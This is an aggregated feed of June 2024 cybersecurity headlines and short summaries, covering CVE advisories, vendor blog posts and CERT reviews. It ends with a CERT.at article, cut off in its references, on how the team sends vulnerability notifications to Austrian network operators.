Akamai Doubles Down on API Security
2024-06-25T11:00:00Z | 1719313200

https://www.akamai.com/blog/security/2024/jun/akamai-doubles-down-on-api-security
Unleashing SASE for All: Empowering the Channel Ecosystem Business
2024-06-25T10:02:18Z | 1719309738

The concept of Secure Access Service Edge (SASE) promised a revolution in network security. Its core intent: to simplify the deployment and consumption of both networking and security functions. However, does the reality really live up to the initial hype? The Intent Behind SASE SASE is meant to streamline the delivery of network security functions,... The post Unleashing SASE for All: Empowering the Channel Ecosystem Business appeared first on Cato Networks.

https://www.catonetworks.com/blog/unleashing-sase-for-all-empowering-the-channel-ecosystem-business/
Cyber weather for May 2024
2024-06-25T08:54:28Z | 1719305668

Cyber weather continued to be gloomy in May. Cyber weather was particularly darkened by the reported cases of data breaches and leaks. There was also a storm of scams and phishing.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_05/2024
Cyber weather for May 2024
2024-06-25T08:54:28Z | 1719305668

Cyber weather continued to be gloomy in May. Cyber weather was particularly darkened by the reported cases of data breaches and leaks. There was also a storm of scams and phishing.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_05/2024
Security Alert (A24-06-13): Multiple Vulnerabilities in Google Chrome
2024-06-25T04:00:00Z | 1719288000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Tp-Link ER7206 Omada Gigabit VPN Router cli_server debug leftover debug code vulnerability
2024-06-25T00:00:00Z | 1719273600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1947
IPC Fuzzing with Snapshots
2024-06-24T19:48:18Z | 1719258498

Process separation remains one of the most important parts of the Firefox security model and securing our IPC (Inter-Process Communication) interfaces is crucial to keep privileges in the different processes … Read more

https://blog.mozilla.org/attack-and-defense/2024/06/24/ipc-fuzzing-with-snapshots/
Object Injection vulnerability fixed in SEOPress 7.9
2024-06-24T14:00:00Z | 1719237600

During a routine audit of various WordPress plugins, we identified a few issues in SEOPress (300k+ active installs). More specifically, we discovered an authentication bug which could allow attackers to access certain protected REST API routes without having any kind of account on the targeted site. Digging deeper into what an attacker could do with this […]

https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
Disarming Fiat-Shamir footguns
2024-06-24T13:00:38Z | 1719234038

The Fiat-Shamir transform is an important building block in zero-knowledge proofs (ZKPs) and multi-party computation (MPC). It allows zero-knowledge proofs based on interactive protocols to be made non-interactive. Essentially, it turns conversations into documents. This ability is at the core of powerful technologies like SNARKs and STARKs. Useful stuff! But the Fiat-Shamir […]

https://blog.trailofbits.com/2024/06/24/disarming-fiat-shamir-footguns/
Women in Tech: Remain Open to Unexpected Opportunities
2024-06-24T13:00:00Z | 1719234000

Akamai CIO Kate Prouty explores the benefits of remaining open to new opportunities and salutes the bond among women in tech.

https://www.akamai.com/blog/culture/2024/jun/women-in-tech-remain-open-unexpected-opportunities
Vulnerability in CRUDDIY software
2024-06-24T12:00:00Z | 1719230400

OS Command Injection vulnerability (CVE-2024-4748) has been found in CRUDDIY software.

https://cert.pl/en/posts/2024/06/CVE-2024-4748/
SQL Injection vulnerability in MegaBIP software
2024-06-24T11:00:00Z | 1719226800

During its own research, CERT Polska has found another SQL Injection vulnerability (CVE-2024-6160) in MegaBIP software.

https://cert.pl/en/posts/2024/06/CVE-2024-6160/
VBSpam tests to be executed under the AMTSO framework
2024-06-24T08:57:00Z | 1719219420

VB is excited to announce that, starting from the Q3 test, all VBSpam tests of email security products will be executed under the AMTSO framework. Read more

https://www.virusbulletin.com/blog/2024/06/vbspam-tests-be-executed-under-amtso-framework/
Transform your SASE Services with the Cato MSASE Partner Platform
2024-06-23T14:06:23Z | 1719151583

The post Transform your SASE Services with the Cato MSASE Partner Platform appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-transform-your-sase-services-with-cato-msase
EuroLLVM 2024 trip report
2024-06-21T13:00:22Z | 1718974822

EuroLLVM is a developer meeting focused on projects under the LLVM Foundation umbrella that live in the LLVM GitHub monorepo, like Clang and—more recently, thanks to machine learning research—the MLIR framework. Trail of Bits, which has a history in compiler engineering and all things LLVM, sent a bunch of […]

https://blog.trailofbits.com/2024/06/21/eurollvm-2024-trip-report/
Unveiling Active Directory Security Risks: A Comprehensive Analysis of Management Issues and Vulnerabilities
2024-06-21T10:30:00Z | 1718965800

In this report, CyCraft research team analyzes 27 listed companies in Taiwan, Level-A government agencies and healthcare institutions, covering 46 AD Domains, with 1,057,000 objects included.

https://www.first.org/blog/20240621-Unveiling_Active_Directory_Security_Risks
Unveiling Active Directory Security Risks: A Comprehensive Analysis of Management Issues and Vulnerabilities
2024-06-21T10:30:00Z | 1718965800

In this report, CyCraft research team analyzes 27 listed companies in Taiwan, Level-A government agencies and healthcare institutions, covering 46 AD Domains, with 1,057,000 objects included.

https://www.first.org/blog/20240621-Unveiling_Active_Directory_Security_Risks
CERT.LV activity review Q1 2024
2024-06-21T06:49:14Z | 1718952554

In Q1 2024, the number of threats and incidents reduced only by 3% compared to the same period in 2023. In addition, it was 5% higher than in the last three quarters of previous year. Latvia has demonstrated a convincing cyber- resilience, and cyber-attacks recorded so far have not had a significant or lasting impact on society.

https://cert.lv/en/2024/06/cert-lv-activity-review-q1-2024
Security Alert (A24-06-11): Multiple Vulnerabilities in Microsoft Edge
2024-06-21T04:00:00Z | 1718942400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-06-12): Multiple Vulnerabilities in SonicWall Products
2024-06-21T04:00:00Z | 1718942400

SonicWall released security advisories to address multiple vulnerabilities in SonicWall systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato’s game-changing MSASE Partner Platform: Because service providers also needed a break
2024-06-20T10:27:35Z | 1718879255

Managed service providers tell us they see great opportunity from so many businesses migrating to SASE. But many struggle to take advantage of it. Why is that? In this post, we’ll examine why service providers can find it hard to build a Managed SASE (MSASE) service, and four things they need when launching one. We’ll... The post Cato’s game-changing MSASE Partner Platform: Because service providers also needed a break  appeared first on Cato Networks.

https://www.catonetworks.com/blog/catos-game-changing-msase-partner-platform-because-service-providers-also-needed-a-break/
Heap-based buffer overflow vulnerability in SonicOS SSL-VPN
2024-06-20T07:41:28Z | 1718869288

Heap-based buffer overflow vulnerability in the SonicOS SSL-VPN allows an authenticated remote attacker to cause Denial of Service (DoS) via memcpy function.SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall. CVE: CVE-2024-29013 Last updated: July 26, 2024, 7:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0009
Stack-based buffer overflow vulnerability in SonicOS HTTP server
2024-06-20T07:37:13Z | 1718869033

Stack-based buffer overflow vulnerability in the SonicOS HTTP server allows an authenticated remote attacker to cause Denial of Service (DoS) via sscanf function.SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall. CVE: CVE-2024-29012 Last updated: July 26, 2024, 7:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0008
The National Cyber Security Centre Finland’s weekly review – 25/2024
2024-06-20T07:12:14Z | 1718867534

This week we will talk about matters such as how physical security is one of the key factors of information security and recommend that you prepare for a transition to quantum-safe encryption algorithms.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-252024
The National Cyber Security Centre Finland’s weekly review – 25/2024
2024-06-20T07:12:14Z | 1718867534

This week we will talk about matters such as how physical security is one of the key factors of information security and recommend that you prepare for a transition to quantum-safe encryption algorithms.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-252024
The Cybersecurity Crystal Ball: Can We Predict Future Threats?
2024-06-20T01:49:09Z | 1718848149

Predicting future OT cyber security is like peering into a crystal ball looking for coherent answers through a transparent piece of glass. But we have a lot of experience encountering and striving against threat actors, so we can discern trends in hacker activities over the last year. While our crystal ball is not perfect, it […] The post The Cybersecurity Crystal Ball: Can We Predict Future Threats? appeared first on Radiflow.

https://www.radiflow.com/blog/predicting-the-near-future-of-ot-cyber-security/
Host ID + Vectra AI Take the Guesswork Out of Threat Detection and Response by Zoey Chu
2024-06-20T00:00:00Z | 1718841600

Hear from Zoey Chu, Vectra AI Product Marketing Manager, and Gearoid O Fearghail, Vectra AI Product Manager, as they explain the power of Host ID and how it helps you track down attackers with ease.

https://www.vectra.ai/blog/host-id-vectra-ai-take-the-guesswork-out-of-threat-detection-and-response
Ettevõtetel on viimane võimalus taotleda küberturvalisuse toetust
2024-06-19T06:46:13Z | 1718779573

Väikesed ja keskmise suurusega ettevõtted saavad kuni 2. septembrini taotleda toetust oma küberturvalisuse hindamiseks ja parandamiseks, et hoida ära küberrünnakute või tehniliste tõrgetega kaasnevat kahju.

https://ria.ee/uudised/ettevotetel-viimane-voimalus-taotleda-kuberturvalisuse-toetust
High Threat Security Alert (A24-06-09): Multiple Vulnerabilities in VMware Products
2024-06-19T04:00:00Z | 1718769600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-06-10): Multiple Vulnerabilities in Google Chrome
2024-06-19T04:00:00Z | 1718769600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Advisory - Connection Hijacking Vulnerability in Some Huawei Home Routers
2024-06-19T00:00:00Z | 1718755200

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-chvishhr-d616b19e-en
Security Advisory - Path Traversal Vulnerability in Huawei Home Music System
2024-06-19T00:00:00Z | 1718755200

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-ptvihhms-20747ba3-en
iboss Named to Inc.’s Annual List of Best Workplaces for 2024
2024-06-18T13:10:50Z | 1718716250

iboss Named to Inc.’s Annual List of Best Workplaces for 2024! The post iboss Named to Inc.’s Annual List of Best Workplaces for 2024 appeared first on iboss.

https://www.iboss.com/news/iboss-named-to-inc.s-annual-list-of-best-workplaces-for-2024/
Themes from Real World Crypto 2024
2024-06-18T13:00:27Z | 1718715627

In March, Trail of Bits engineers traveled to the vibrant (and only slightly chilly) city of Toronto to attend Real World Crypto 2024, a three-day event that hosted hundreds of brilliant minds in the field of cryptography. We also attended three associated events: the Real World Post-Quantum Cryptography (RWPQC) workshop, the Fully Homomorphic Encryption (FHE) […]

https://blog.trailofbits.com/2024/06/18/themes-from-real-world-crypto-2024/
The Difference Between API Gateway and WAAP ? and Why You Need Both
2024-06-18T13:00:00Z | 1718715600

With these best-in-class security solutions, your organization can achieve a more secure and efficient digital environment.

https://www.akamai.com/blog/security/2024/jun/difference-between-api-gateway-waap-why-you-need-both
SolarWinds Serv-U (CVE-2024-28995) exploitation: We see you!
2024-06-18T00:00:00Z | 1718668800

Discover details about CVE-2024-28995, a path-traversal vulnerability in SolarWinds Serv-U, and see how a honeypot setup revealed diverse exploit attempts, including manual attacks. Learn how attackers bypassed filters and targeted specific files in this comprehensive analysis.

https://www.greynoise.io/blog/solarwinds-serv-u-cve-2024-28995-exploitation-we-see-you
Finding mispriced opcodes with fuzzing
2024-06-17T13:00:43Z | 1718629243

Fuzzing—a testing technique that tries to find bugs by repeatedly executing test cases and mutating them—has traditionally been used to detect segmentation faults, buffer overflows, and other memory corruption vulnerabilities that are detectable through crashes. But it has additional uses you may not know about: given the right invariants, we can use […]

https://blog.trailofbits.com/2024/06/17/finding-mispriced-opcodes-with-fuzzing/
CVE-2024-5558
2024-06-17T08:15:00Z | 1718612100

The vulnerabilities, if explooited, may risk exposure of SNMP credentials and escalation of privileges which could cause unauthorized changes to the system configuration.

https://claroty.com/team82/disclosure-dashboard/cve-2024-5558
CVE-2024-5557
2024-06-17T08:15:00Z | 1718612100

The vulnerabilities, if explooited, may risk exposure of SNMP credentials and escalation of privileges which could cause unauthorized changes to the system configuration.

https://claroty.com/team82/disclosure-dashboard/cve-2024-5557
The Unauditable, Unmanageable HMAC Keys in Google Cloud by Kat Traxler
2024-06-17T00:00:00Z | 1718582400

This blog outlines three vulnerabilities surfaced from how Google Cloud handles user-asociated HMAC keys.

https://www.vectra.ai/blog/working-as-intended-the-unauditable-unmanageable-keys-in-google-cloud
Addressing CxO Questions About SASE
2024-06-16T16:54:38Z | 1718556878

A New Reality The nature of the modern digital business is constantly and rapidly evolving, requiring network and security architectures to move at the same speed.  Moving at the speed of business demands a new architecture that is agile, flexible, highly scalable, and very secure to keep pace with dynamic business changes.  In short, this... The post Addressing CxO Questions About SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/addressing-cxo-questions-about-sase/
Understanding Apple’s On-Device and Server Foundation Models release
2024-06-14T20:49:37Z | 1718398177

Earlier this week, at Apple’s WWDC, we finally witnessed Apple’s AI strategy. The videos and live demos were accompanied by two long-form releases: Apple’s Private Cloud Compute and Apple’s On-Device and Server Foundation Models. This blog post is about the latter. So, what is Apple releasing, and how does it compare to […]

https://blog.trailofbits.com/2024/06/14/understanding-apples-on-device-and-server-foundations-model-release/
PCC: Bold step forward, not without flaws
2024-06-14T19:46:48Z | 1718394408

Earlier this week, Apple announced Private Cloud Compute (or PCC for short). Without deep context on the state of the art of Artificial Intelligence (AI) and Machine Learning (ML) security, some sensible design choices may seem surprising. Conversely, some of the risks linked to this design are hidden in the fine print. […]

https://blog.trailofbits.com/2024/06/14/pcc-bold-step-forward-not-without-flaws/
The National Cyber Security Centre Finland’s weekly review – 24/2024
2024-06-14T19:26:21Z | 1718393181

This week, our topics include CEO fraud and how supply chain attacks have increased in recent years. We also look back at the previous month with the May Cyber Weather report.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-242024
The National Cyber Security Centre Finland’s weekly review – 24/2024
2024-06-14T19:26:21Z | 1718393181

This week, our topics include CEO fraud and how supply chain attacks have increased in recent years. We also look back at the previous month with the May Cyber Weather report.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-242024
Proactive Intelligence Against Infostealers: Lessons from the Snowflake Data Breach
2024-06-14T16:05:01Z | 1718381101

After major cyber attacks or data breaches, cybersecurity companies and professionals universally face the question, "How would you have detected or prevented this type of attack?" This week, the question is related to the Snowflake data breach.

https://www.ironnet.com/blog/proactive-intelligence-against-infostealers-lessons-from-the-snowflake-data-breach
Akamai?s Perspective on June?s Patch Tuesday 2024
2024-06-14T14:00:00Z | 1718373600

https://www.akamai.com/blog/security-research/2024/jun/akamai-perspective-patch-tuesday-june-2024
Announcing the Burp Suite Professional chapter in the Testing Handbook
2024-06-14T13:00:23Z | 1718370023

Based on our security auditing experience, we’ve found that Burp Suite Professional’s dynamic analysis can uncover vulnerabilities hidden amidst the maze of various target components. Unpredictable security issues like race conditions are often elusive when examining source code alone. While Burp is a comprehensive tool for web application security testing, its extensive […]

https://blog.trailofbits.com/2024/06/14/announcing-the-burp-suite-professional-chapter-in-the-testing-handbook/
How Healthcare Providers Should Think About Balancing Innovation Efforts with Cybersecurity Goals
2024-06-14T13:00:00Z | 1718370000

https://www.akamai.com/blog/security-research/healthcare-providers-balancing-innovation-efforts-with-cybersecurity-goals
Vulnerability in 2ClickPortal software
2024-06-14T11:00:00Z | 1718362800

Stored XSS vulnerability (CVE-2024-5961) has been found in 2ClickPortal software.

https://cert.pl/en/posts/2024/06/CVE-2024-5961/
The National Cyber Security Centre Finland’s weekly review – 23/2024
2024-06-14T05:30:44Z | 1718343044

An SMS scam phishing people’s online bank credentials on the pretext of unpaid fines in Traficom’s name. A police operation discovered over 19 million terminal devices in a closed botnet. The botnet was operated by malware installed on millions of terminal devices around the world. Follow these instructions to make sure your device is not part of the botnet.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-232024
The National Cyber Security Centre Finland’s weekly review – 23/2024
2024-06-14T05:30:44Z | 1718343044

An SMS scam phishing people’s online bank credentials on the pretext of unpaid fines in Traficom’s name. A police operation discovered over 19 million terminal devices in a closed botnet. The botnet was operated by malware installed on millions of terminal devices around the world. Follow these instructions to make sure your device is not part of the botnet.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-232024
Security Alert (A24-06-07): Multiple Vulnerabilities in Microsoft Edge
2024-06-14T04:00:00Z | 1718337600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-06-08): Multiple Vulnerabilities in Fortinet Products
2024-06-14T04:00:00Z | 1718337600

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Shifting IT operations from monitoring to automation
2024-06-13T12:00:00Z | 1718280000

In a new video, Tech YouTuber David Bombal sits down with Joe Vaccaro, VP and General Manager of ThousandEyes, to unpack the recent announcements revealed at Cisco Live US. They discuss combining unmatched telemetry data and AI-driven capabilities to transform Digital Experience Assurance.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m06/shifting-it-operations-from-monitoring-to-automation.html
How to Plan a SASE Project
2024-06-13T11:56:13Z | 1718279773

The post How to Plan a SASE Project appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-plan-a-sase-project/
What's Going on with CVE-2024-4577 (Critical RCE in PHP)?
2024-06-13T00:00:00Z | 1718236800

Examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability exploits a 'best-fit' Unicode processing behavior in Windows.

https://www.greynoise.io/blog/whats-going-on-with-cve-2024-4577-critical-rce-in-php
Hillstone Networks Recognized in the Gartner® Voice of the Customer for Network Firewalls for 5th Consecutive Year
2024-06-12T23:30:53Z | 1718235053

Hillstone Networks delivers AI-powered platform to secure any workload across any deployment model. SANTA CLARA, Calif., June 12, 2024 /PRNewswire/ — Hillstone Networks, a leading provider of cybersecurity solutions, has garnered for the 5th consecutive year the Gartner® Peer Insights™ “Voice of the Customer for Network Firewalls”. Gartner Peer Insights is a public platform that […] The post Hillstone Networks Recognized in the Gartner® Voice of the Customer for Network Firewalls for 5th Consecutive Year appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-recognized-in-the-gartner-voice-of-the-customer-for-network-firewalls-for-5th-consecutive-year/
Critical vulnerabilities in MegaBIP software
2024-06-12T15:00:00Z | 1718204400

During its own research, CERT Polska has found 3 critical vulnerabilities (CVE-2024-1576, CVE-2024-1577 and CVE-2024-1659) in MegaBIP software.

https://cert.pl/en/posts/2024/06/CVE-2024-1576/
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. június
2024-06-12T08:34:21Z | 1718181261

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő, kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt. A Microsoft 2024. június havi biztonsági csomagjában összesen 51 különböző biztonsági hibát javított, köztük 1 nulladik napi (zero-day) sebezhetőséget is, e sérülékenység esetében jelenleg […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-junius/
High Threat Security Alert (A24-06-04): Multiple Vulnerabilities in Microsoft Products (June 2024)
2024-06-12T04:00:00Z | 1718164800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-06-05): Multiple Vulnerabilities in Google Chrome
2024-06-12T04:00:00Z | 1718164800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-06-06): Multiple Vulnerabilities in Firefox
2024-06-12T04:00:00Z | 1718164800

Mozilla has published the advisories (MFSA2024-25 and MFSA2024-26) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Exploiting ML models with pickle file attacks: Part 2
2024-06-11T15:00:17Z | 1718118017

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call […]

https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-2/
onwebkitplaybacktargetavailabilitychanged?! New exotic events in the XSS cheat sheet
2024-06-11T14:58:29Z | 1718117909

The power of our XSS cheat sheet is we get fantastic contributions from the web security community and this update is no exception. We had valuable contributions from Mozilla to remove events that no

https://portswigger.net/research/new-exotic-events-in-the-xss-cheat-sheet
Exploiting ML models with pickle file attacks: Part 1
2024-06-11T13:00:36Z | 1718110836

We’ve developed a new hybrid machine learning (ML) model exploitation technique called Sleepy Pickle that takes advantage of the pervasive and notoriously insecure Pickle file format used to package and distribute ML models. Sleepy pickle goes beyond previous exploit techniques that target an organization’s systems when they deploy ML models to instead […]

https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/
Security Alert PHP CVE-2024-4577: Stormshield’s product response
2024-06-11T12:39:21Z | 1718109561

A critical vulnerability impacting the PHP-CGI service, identified by the references CVE-2024-4577, has been published. It has been assigned a respective CVSS 3.1 score of 9.8. It must be noted that there are multiple proofs of concept easily available online and many exploitations have already... The post Security Alert PHP CVE-2024-4577: Stormshield’s product response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/
High Threat Security Alert (A24-06-03): Multiple Vulnerabilities in PHP
2024-06-11T04:00:00Z | 1718078400

PHP has released security advisories to address multiple vulnerabilities in PHP.

https://www.govcert.gov.hk/en/alerts_detail.php
Cristine Hoepers Inducted into FIRST's Incident Response Hall of Fame
2024-06-11T00:00:00Z | 1718064000

Global Cyber Security Leader Honored for Advancing Incident Response Worldwide

https://www.first.org/newsroom/releases/20240613
Vulnerabilities in medical clinics software
2024-06-10T11:00:00Z | 1718017200

Vulnerabilities have been detected in the Eurosoft Przychodnia, drEryk Gabinet and SimpleCare software, involving the use of the same, hard-coded password for the database. The vulnerabilities were assigned identifiers CVE-2024-1228, CVE-2024-3699 and CVE-2024-3700.

https://cert.pl/en/posts/2024/06/CVE-2024-1228/
Ongoing state-sponsored cyber espionage campaign via vulnerable edge devices
2024-06-10T10:00:00Z | 1718013600

Earlier this year, the NCSC, in collaboration with the Dutch Military Intelligence and Security Service (MIVD) and the Dutch General Intelligence and Security Service (AIVD), published a report on advanced COATHANGER-malware targeting FortiGate-systems. The MIVD has continued its investigation into the associated Chinese cyber espionage campaign, which has proven to be far more extensive than previously acknowledged. In response, the NCSC is calling for heightened vigilance regarding this campaign and the exploitation of vulnerabilities in edge devices. To support this effort, the NCSC has developed a factsheet detailing information on edge devices, associated challenges, and recommendations.

https://english.ncsc.nl/latest/news/2024/june/10/ongoing-state-sponsored-cyber-espionage-campaign-via-vulnerable-edge-devices
Cyber Europe 2024
2024-06-10T09:07:37Z | 1718010457

The largest European Cyber exercise is back this year for its 7th edition! The 2-days event will take place in June tackling the resilience of our Energy sector, and challenging thousands of players acting closely with cybersecurity.

https://cert.lv/en/2024/06/cyber-europe-2024
Debunking The Top 10 Discrete Manufacturing OT Cybersecurity Myths
2024-06-10T08:27:21Z | 1718008041

When you think of cybersecurity, what comes to mind?

https://blog.scadafence.com/debunking-the-top-10-discrete-manufacturing-ot-cybersecurity-myths
How We Cover Your Back
2024-06-10T07:37:37Z | 1718005057

As a national CERT, one of our extremely important tasks is to proactively inform network operators about potential or confirmed security issues that could affect Austrian companies. Initially, I intended to discuss the technical changes in our systems, but I believe it's better to start by explaining what we actually do and how we help you sleep well at night — though you should never rely solely on us! Understanding the Security Landscape Consider the vastness of the Internet: millions of connected devices, millions of different configurations, and thousands of solutions. In Austria alone, shodan.io reports approximately 1.7 million devices accessible online [1]. These include web and mail servers, VPN endpoints, databases, and virtually anything else you can imagine connected to the Internet. Such devices can be misconfigured, exposed by mistake, or have critical vulnerabilities. While the owners are primarily responsible for their services, we enhance the security of Austrians by notifying network operators of significant issues. As you can imagine, handling every possible case would be impossible. Therefore, we focus on the most typical issues and automate much of our processes. Our approach heavily relies on automated data processing and sending notifications via email. To accomplish this, we subscribe to data feeds from partners like ShadowServer [2], a non-profit organization, and process them with an open-source solution called IntelMQ [3]. We handle about 90 thousand events daily, resulting in approximately 3-4 thousand emails sent out each month. With few exceptions, we do not scan online accessible devices. Firstly, we lack the resources to scan the Internet for so many different cases independently. Moreover, scanning poses legal challenges; it's entirely illegal in some countries, while others permit it. We might eventually gain the explicit right, and in some cases, even the obligation to perform scans under the NIS2 law. However, it’s still just a draft [4], and we are waiting for the final version. Our partners who conduct scans ensure they do so legally and non-intrusively, typically operating their servers in countries where scanning isn’t prohibited. This is the approach chosen by ShadowServer [5], our main data source. Our Role If we don’t scan, what exactly is our role? Simply put: we inform YOU. The details, however, are more complex. Simplifying, we manage two types of data feeds: regular, fully automated feeds, and urgent feeds received e.g. during ongoing incidents from researchers who have identified vulnerable or infected devices. The automated feeds are immediately processed by our IntelMQ system. Urgent data feeds first go through ChatGPT a human element — our Coordination Team (the friendly people who respond to your emails and monitor current threats, as seen in our daily news selections [6]) and, if necessary, our Analysis Team (other nice people who specialize in deciphering what is really happening). They assess the information's source and relevance to ensure it pertains to significant incidents and that we keep you informed about what truly matters without spamming you. Later, everything proceeds through IntelMQ, where our workflows are largely similar for both types of cases. We standardize the format, de-duplicate (to avoid sending you multiple notifications about the same issue from different sources), and seek contact data for the operators of the affected devices and services to make our notifications as valuable as possible. Each morning, we send these notifications via email to network operators. In urgent cases, the Coordination Team may decide to send notifications at any time. Then, the ball is in your court: you need to decide what to do with the information. This usually involves patching affected software or restricting access to services, though sometimes you may decide the current configuration is necessary and choose to keep a database open, for example. You can always write back to us for clarifications or to request exclusion from future notifications. If no action is taken, we will notify you again, typically every 30 days, depending on the issue's criticality. We strive to maintain a low level of false positives — no one wants to deal with them. However, we send notifications in dozens of cases [7], and you might occasionally leave access to a service open intentionally, perhaps because it contains public data or for other reasons. While this may be acceptable, we urge you to consider such decisions carefully, especially when you receive a notification from us. In many cases, services left intentionally open can be exploited for (D)DoS amplification attacks — a situation where a threat actor tricks your system into sending a large amount of data to the targeted victim, as seen in well-known attacks leveraging Memcache [8]. When operating services accessible online, please consider not only your own needs but also take steps to minimize the risk of your systems being used to harm others. How the data are processed at CERT.at Do We Know You? Probably not — and that's a challenge. The effectiveness of our notifications largely depends on whether they reach the right person. Finding accurate contact data is not straightforward, and this is an area where we invest significant effort to improve. Our security issue notifications typically target specific servers identified by their IP addresses. The first place we look for contact information is the RIPE Database [9]. For example, if we receive an event related to an IP in a network operated by nic.at, our parent company, we can directly access the RIPE Database for relevant abuse contacts [10]. This method works best for organizations that manage their own IP ranges and maintain current, monitored abuse contacts. However, it's often not so simple. Many times, we only receive a generic abuse email from an Internet Service Provider or hosting platform. While we send the notification, ensuring it reaches the operators responsible for the actual services depends on each company's internal procedures. We appreciate those who take this responsibility seriously (thank you!), but others struggle with properly forwarding notifications to the relevant caretakers. While we cannot influence how ISPs handle our notifications, their clients can take steps to ensure notifications are passed along. Perhaps you might consider asking your providers how they manage such notifications? To address these issues, we maintain internal contacts with a list of operators. Currently, this system does not scale well as we mostly have information for organizations we directly work with, and updating contacts is mostly manual. Our attempt to solve this problem is building a professional Constituency Portal [11]. We have already migrated a significant portion of our contact data there and are working on further integrations with our internal systems. Soon, users of the Portal will be able to provide abuse contacts and manage the types of notifications they wish to receive from us. Access to the portal is currently very limited, but we hope to onboard more organizations this year. Staying Up-to-Date Another challenge we face is deciding which data we process automatically and keeping an eye on existing sources. This is crucial for providing trustworthy and accurate information. Over the past year, we developed a process that includes regular meetings of representatives from all involved teams. Every two weeks, we discuss all recent and incoming changes in our notification system. New data feeds, which we learn about from our current sources, private connections, meetings at different events, or public announcements, are briefly discussed. If needed, the Analysis Team has a closer look. The Coordination Team shares feedback experiences and prepares necessary communications. Finally, the Data & Development Team is responsible for integrating the data feed and ensuring that the system operates smoothly daily. This new process and a one-time review of existing sources resulted in a significant increase in the types of issues we process. For our main provider, ShadowServer, we doubled the number of processed feeds in the last year, currently supporting about 70 of their feeds. For most data, we also have prepared short descriptions available on our website [12]. It's Just the Beginning I've briefly described how we attempt to proactively inform network operators about potential issues. While we do our best to constantly expand our coverage and improve notification delivery, it's crucial to emphasize: we do not replace your responsibility for your services. We are here to help, but ultimately, you are responsible for your services. We do not see everything, we do not check everything, and most importantly, even if we try to be as quick as possible, if we have notified you, threat actors may have already noticed your service. Be proactive, responsible, and take timely precautions. This post is just a small sample from our daily tasks, based on what I’m personally involved in. We provide many more services, including issuing public warnings, monitoring news sources, responding to incidents, sharing IoCs, and collecting NIS incident notifications. Every day, we do our best to cover your back. References [1] https://www.shodan.io/search?query=country%3AAT [2024-05-15][2] https://www.shadowserver.org [3] https://github.com/certtools/intelmq[4] https://www.ris.bka.gv.at/Dokument.wxe?Abfrage=Begut&Dokumentnummer=BEGUT_42FD65C8_76B7_40F0_97E3_BB29BDFC0CE9[5] https://www.shadowserver.org/faq/is-scanning-legal/[6] https://www.cert.at/de/meldungen/tagesberichte/  (partially in German only)[7] https://www.cert.at/de/services/daten-feeds/vulnerable/ [8] https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/ [9] https://apps.db.ripe.net/db-web-ui/query [10] https://apps.db.ripe.net/docs/Types-of-Queries/Abuse-Contacts/ [11] 